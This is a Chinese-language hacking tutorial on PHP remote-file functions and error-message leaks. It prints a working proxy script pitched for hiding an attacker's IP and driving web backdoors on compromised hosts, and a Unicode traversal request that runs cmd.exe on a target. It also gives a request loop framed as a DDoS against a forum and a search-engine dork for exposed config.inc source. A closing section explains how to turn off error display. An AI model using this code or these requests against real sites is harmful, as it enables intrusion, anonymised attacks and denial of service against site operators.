1.遠程文件

　　PHP是一門具有豐富特性的語言，它提供了大量函數(shù)，使程序員能夠方便地實現(xiàn)各種功能，遠程文件就是一個很好的例子：

　　代碼

　　$fp=@Fopen($url,"r") or die ("cannot open $url");

　　while($line=@fgets($fp,1024)) {

　　$contents.=$line;

　　}

　　echo $contents; //顯示文件內(nèi)容

　　fclose($fp); //關閉文件

　　?>

　　以上是一段利用Fopen函數(shù)打開文件的代碼，由于Fopen函數(shù)支持遠程文件，使得它應用起來相當有趣，將以上代碼保存為Proxy.php，然后后提交：

　　代碼

　　/proxy.php?url=http://www.hacker.com.cn/bbs

　　這時候你會發(fā)現(xiàn)論壇下方顯示的IP地址變成了PHP腳本所處服務器的IP地址。Fopen函數(shù)可以從任何其Web或FTP站點讀取文件，事實上PHP的大多數(shù)文件處理函數(shù)對遠程文件都是透明的，比如請求：

　　代碼

　　/proxy.php?url=http://target/ｓｃｒｉｐｔ/..%c1%1c../winnt/system32/cmd.exe?/c+dir

　　這樣實際上是利用了Target主機上的Unicode漏洞，執(zhí)行了DIR命令。但并不是所有的服務器都支持遠程文件的功能，如果你使用的是商業(yè)的服務器，很可能會發(fā)現(xiàn)遠程文件使用不了(如51的虛擬主機)，這是因為在商業(yè)主機上限制遠程文件的功能，往往能夠更好的保護服務器的正常運行。你可以通過PHPinfo()查看服務器是否支持這種功能。當然，在PHPinfo()被禁用的情況下，也可以使用Get_cfg_var()：

　　代碼

　　echo "是否允許使用遠程文件(allow_url_Fopen)";

　　?php

　　if (get_cfg_var("allow_url_Fopen")=="1")

　　{

　　echo("是");

　　}

　　else echo("否");

　　?>

　　當Allow_url_Fopen一項參數(shù)為ON時，即支持遠程文件的功能。充分發(fā)揮遠程文件的特性，我們可以實現(xiàn)許多特殊的功能：如果你是用過PHP Flame的最新版本，你會發(fā)現(xiàn)它在集文件夾復制、文本搜索等功能的基礎上，又增加了Web間文件傳輸?shù)墓δ?，依靠這種功能，你可以隨意將其他服務器上的文件傳送到你的Web目錄下。而且，在兩臺服務器間傳送文件有著飛快的傳輸速度。我們看看實現(xiàn)這個功能的代碼：

　　代碼

　　$fp = Fopen($_GET['filename'], 'rb'); //打開文件

　　$data = $tmp = '';

　　while ( true ) {

　　$tmp = fgets($fp, 1024);

　　if ( 0 === strlen($tmp) ) {

　　break; //跳出while循環(huán)

　　}

　　$data .= $tmp;

　　}

　　fclose($fp); //關閉文件

　　$file=preg_replace("/^.+//","",$filename);//轉換文件名

　　//write

　　$fp = Fopen("$file", 'wb'); //生成文件

　　fwrite($fp, $data); //寫入數(shù)據(jù)

　　fclose($fp);

　　?>

　　在調(diào)用Fopen和Fwrite函數(shù)時加入"b"標記，可以使這兩個函數(shù)安全運用于二進制文件而不損壞數(shù)據(jù)。在以上腳本提交：

　　/down.php?filename=http://www.chinaz.com/winrar.zip

　　這時便會在Down.php的所處目錄下生成相應的Winrar.zip文件。如果再配合遍歷目錄的功能，你將可以實現(xiàn)多個文件夾服務器間的傳輸。但是，遠程文件應該還有更大的發(fā)揮空間，比如寫SQL Injection攻擊的自動腳本，甚至是HTTP的代理服務：

　　代碼

　　$url = getenv("QUERY_STRING");

　　if(!ereg("^http",$url)) //檢查輸入的URL格式

　　{

　　echo "例子：
http://www.163.com/
";

　　echo "http://www.xxxx.com/list.php?id=600
";

　　echo "當URL為目錄時需要在目錄后加入"/"";

　　exit;

　　}

　　if($url)

　　$url=str_replace("\","/",$url);

　　$f=@Fopen($url,"r"); //打開文件

　　$a="";

　　if($f)

　　{

　　while(!feof($f))

　　$a.=@fread($f,8000); //讀取文件

　　fclose($f);

　　}

　　$rooturl = preg_replace("/(.+/)(.*)/i","\1",$url); //轉換根目錄

　　$a = preg_replace("/(src[[:space:]]*=['"])([^h].*?)/is","\1$rooturl\2",$a);

　　$a = preg_replace("/(src[[:space:]]*=)([^h'"].*?)/is","\1$rooturl\2",$a); //轉換圖片地址

　　$a = preg_replace("/(action[[:space:]]*=['"])([^h].*?)/is","\1$php_self?$rooturl\2",$a);

　　$a = preg_replace("/(action[[:space:]]*=)([^h'"].*?)/is","\1$php_self?$rooturl\2",$a); //轉換POST地址

　　$a = preg_replace("/(

　　$a = preg_replace("/(

　　$a = preg_replace("/(link.+?href[[:space:]]*=[^'"])(.*?)/is","\1$rooturl\2",$a);

　　$a = preg_replace("/(link.+?href[[:space:]]*=['"])(.*?)/is","\1$rooturl\2",$a); //轉換樣式表地址

　　echo $a;

　　exit;

　　?>

　　在正則表達式的幫助下，以上代碼能夠自行地將返回頁面中包含的鏈接和圖片進行轉換，并把頁面內(nèi)的鏈接自動提交到當前PHP腳本的$url中。例如提交：

　　/proxy.php?http://www.xfocus.net/

　　腳本將會返回http://www.xfocus.net/的內(nèi)容，如圖1所示。

　　圖1

　　當然，這運用的絕對不僅僅是框架的技巧。運用這個腳本你可以遠程操作安置在其他服務器的Web后門，或者將肉雞做成一個簡單的HTTP代理，從而更好的隱藏自己的IP。如果使用PHP編寫CGI掃描工具，你需要延長PHP的有效運行時間。以下是兩種有效的方法，當然你也可以將PHP代碼編譯成GUI界面，從而解決這個問題。設置PHP的有效運行時間為三分鐘：

　　代碼

　　我們再看看這種功能在DDOS攻擊中的應用：

　　代碼

　　set_time_limit(60*3);

　　$url="http://www.xxx.com/bbs/userlist.php?userid=";

　　for($i=1131;$i<=1180;$i++)

　　{

　　$urls=$url.$i; //將$url與$i鏈接在一起

　　$f=@Fopen($urls,"r"); //請求$urls

　　$a=@fread($f,10); //取出部分內(nèi)容

　　fclose($f); //關閉$urls

　　}

　　?>

　　以上用For循環(huán)不斷地請求Userlist.php?userid=$i的內(nèi)容($i的值每次都是不同的)，但是打開后僅僅取出幾個字節(jié)便關閉這個腳本了。PHP運行在虛擬主機上，10秒鐘便可以打開幾十個URL，當同時運行多個進程時，便有可能實現(xiàn)DDOS攻擊，讓對方的論壇迅速崩潰。

　　限于版面，遠程文件的內(nèi)容就先說到這里了，如果你還有不明白的地方，請參考以下的這篇文章：《在PHP中使用遠程文件》

　　2.錯誤回顯

　　PHP在默認的情況下打開錯誤回顯，這樣可以便于程序員在調(diào)試腳本時發(fā)現(xiàn)代碼的錯誤，但是這也往往使Web暴露了PHP的代碼和服務器的一些數(shù)據(jù)。PHP對代碼的規(guī)范性要求比較嚴格，以下是一種比較常見的錯誤回顯：

　　warning:file("data/1120'.htm)-no such file or

　　directory in /usr/home/xxxxx.com/show.php on line 300

　　這種錯誤回顯，至少告訴了我們?nèi)齻€信息：服務器的操作系統(tǒng)是LINUX;服務器使用文本數(shù)據(jù)庫;Show.php的第300行代碼為"file ("./data/1120/".$data.".htm")"。

　　這種錯誤回顯，已經(jīng)足以成為一臺服務器致命的漏洞。從另一個利用的角度來看，我們發(fā)現(xiàn)一般的PHP錯誤回都包含了"warning"字符，但是這有什么用呢?我們得先認識一下PHP的庫文件。

　　PHP的Include()和Require()主要是為了支持代碼庫，因為我們一般是把一些經(jīng)常使用的函數(shù)放到一個獨立的文件中，這個獨立的文件就是代碼庫，當需要使用其中的函數(shù)時，我們只要把這個代碼庫包含到當前的文件中就可以了。

　　最初，人們開發(fā)和發(fā)布PHP程序的時候，為了區(qū)別代碼庫和主程序代碼，一般是為代碼庫文件設置一個".inc"的擴展名，但是他們很快發(fā)現(xiàn)這是一個錯誤，因為這樣的文件無法被PHP解釋器正確解析為PHP代碼。如果我們直接請求服務器上的這種文件時，我們就會得到該文件的源代碼，這是因為當把PHP作為Apache的模塊使用時，PHP解釋器是根據(jù)文件的擴展名來決定是否解析為PHP代碼的。擴展名是站點管理員指定的，一般是".php"， ".php3"和".php4"。如果重要的配置數(shù)據(jù)被包含在沒有合適的擴展名的PHP文件中，那么遠程攻擊者將容易得到這些信息。

　　按照以往的程序員的習慣，往往會把一些重要的文件設定"config.inc","coon.inc"等形式，如果我們在搜索引撃中搜索"warning+config.inc"，那么你會發(fā)現(xiàn)許多網(wǎng)站都暴露了".inc"文件的代碼，甚至包括許多商業(yè)和政府網(wǎng)站，如圖2所示。

　　圖2

　　要關閉PHP的錯誤回顯通常有兩個方法，第一個是直接修改Php.ini中的設置，這我們以前已經(jīng)介紹過了;第二種方法是在PHP腳本中加入抑制錯誤回顯的代碼，你可以在調(diào)用的函數(shù)前函數(shù)加入"@"字符，或者在PHP的代碼頂端加入"error_reporting(0);"的代碼，要了解更多的內(nèi)容請參考PHP手冊中的"error_reporting"一節(jié)。

(本文由責任編輯 pasu 整理發(fā)布)